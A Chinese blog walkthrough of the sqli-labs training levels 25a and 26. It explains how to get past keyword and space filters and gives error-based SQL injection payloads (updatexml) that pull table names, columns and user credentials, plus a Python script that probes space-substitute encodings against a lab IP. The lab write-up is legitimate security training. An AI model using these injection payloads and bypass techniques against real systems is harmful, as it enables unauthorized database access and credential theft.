当前位置:网站首页>sqlilabs(25a-26)
sqlilabs(25a-26)
2022-04-22 04:10:00 【cyphersec】
less-25a
过滤了or和and
变量$id的包裹方式从单引号变成了没有引号包裹,其余和25关一样
less-26
第26关会出现在apach下空格无法转义的问题,所以这里我们用docker做题
先起docker
docker images
docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs
ifconfig
起完docker,先重置数据库再做题
阅读源码发现过滤了很多东西,而且是用正则过滤的
or and / – # 空格 和所有的斜杠和反斜杠
常用的注释符被注释掉了
这里可以尝试用 ;%00 (00截断) 的方式绕过
也可以用%23
或者也可以用 or ‘1’='1 的方式闭合(但是要注意这题的or也被过滤掉了)
or要用 || 绕过,或者用双写绕过
空格也被过滤了,用
/**/
()
回车(url编码中的%0a)
`(tab键上面的按钮)
tap
两个空格(双写绕过)
如果用报错注入的话就不用考虑空格的问题
payload如下:
?id=1' || updatexml(1,concat(0x7e,(database()),0x7e),1) || '1'='1
?id=1' || updatexml(1,concat(0x7e,(database()),0x7e),1) ;%00
成功绕过
接下来查security库下面的表:
?id=1' || updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables) where (table_schema=0x7365637572697479)),0x7e),1) || '1'='1
XPATH syntax error: ‘emails,referers,uagents,users’
发现虽然用了group_concat函数但是还是会出现显示不完全的问题,建议是用limit一个一个的查
?id=1' || updatexml(1,concat(0x7e,(database())),1) || '1'='1
?id=1' || updatexml(1,concat(0x7e,(select(group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema = 0x7365637572697479))),1) ||'1'='1
/?id=1' || updatexml(1,concat(0x7e,(select(group_concat(column_name)) from (infoorrmation_schema.columns) where (table_name = 0x7573657273))),1) || '1'='1
/?id=1' || updatexml(1,concat(0x7e,(select(group_concat(concat_ws(0x7e,username,passwoorrd))) from (security.users))),1) || '1'='1
/?id=1' || updatexml(1,concat(0x7e,(select(group_concat(concat_ws(0x7e,username,passwoorrd))) from (security.users) where (id=2))),1) || '1'='1
#通过改变id的值可以遍历所有的数据
当我们使用%a0充当空格替换的时候:
?id=1' %a0%a0%a0%a0 oorrder %a0by%a0;%00 #其中%a0表示空格
下面这个脚本为判断有哪些符合要求的替换空格的编码
参考:HTML URL
编码参考手册:https://www.w3school.com.cn/tags/html_ref_urlencode.html
脚本如下
# -*- encoding: utf-8 -*-
import requests
for i in range(0, 256):
# print(i)
code = hex(i).replace('0x', '')
if len(code) < 2:
code = "0" + code
code_0x = "%" + code
# print(code_0x)
url = "http://121.199.30.46/Less-26/?id=1'" + code_0x + "%26%26" + code_0x + "'1'='1"
r = requests.get(url=url)
if "Dumb" in r.content.decode("utf-8", "ignore"):
print(code_0x)
版权声明
本文为[cyphersec]所创,转载请带上原文链接,感谢
https://blog.csdn.net/cuddlylm/article/details/124333641
边栏推荐
- Homogeneous nucleation of ice by lammps
- MySQL Download
- [recent force buckle] sum of two numbers + same tree
- Insert a number into the ordered array (Bubble + rand function)
- RF and microwave design software
- The core of improving data utilization efficiency in the transportation industry is to do a good job in data exchange and sharing
- How do CDN acceleration and CDN defense operate to the server?
- Solution of stm32i2c
- Sumo tutorial - Highway
- Why is Nacos so strong
猜你喜欢
24 pictures to conquer border image
matplotlib画3dbox
Autodesk genuine service2020 delete
MySQL Download
Where is the whole house intelligence that Huawei, Haier Zhijia and Xiaomi are all doing?
![[machine learning] long and short term memory network (LSTM)](/img/a0/231bdfb937592e1213782722308f68.png)
[machine learning] long and short term memory network (LSTM)
Matplotlib draw 3dbox
Class组件详解
调用函数时,关于传参那些事~
05-Aggregation
随机推荐
Autodesk genuine Service 2020 Supprimer
Principle of average bilateral locking strategy
[recent force deduction] Fibonacci sequence + realizing queue with two stacks + printing linked list from end to end
Sharing: web design specification
SQL statements used occasionally
染色法判定二分图
The core of improving data utilization efficiency in the transportation industry is to do a good job in data exchange and sharing
01背包问题(二维数组解法以及一位数组优化)
03-DataFrame & Column
04-Functions
腾讯 csig 面试简述(已通过)
. net debugging: use visual studio to debug dump files
Installation team and installation free version
头歌答案(字符串基本操作)
便利店卷疯了:便利蜂、罗森、易捷“激战”
【近日力扣 】两数之和+相同的树
05-Aggregation
Stc8a8k64d4 (51 Series MCU) printf printing data abnormal problem
容联七陌赋能企业智能化服务,重新定义客服价值
shell编程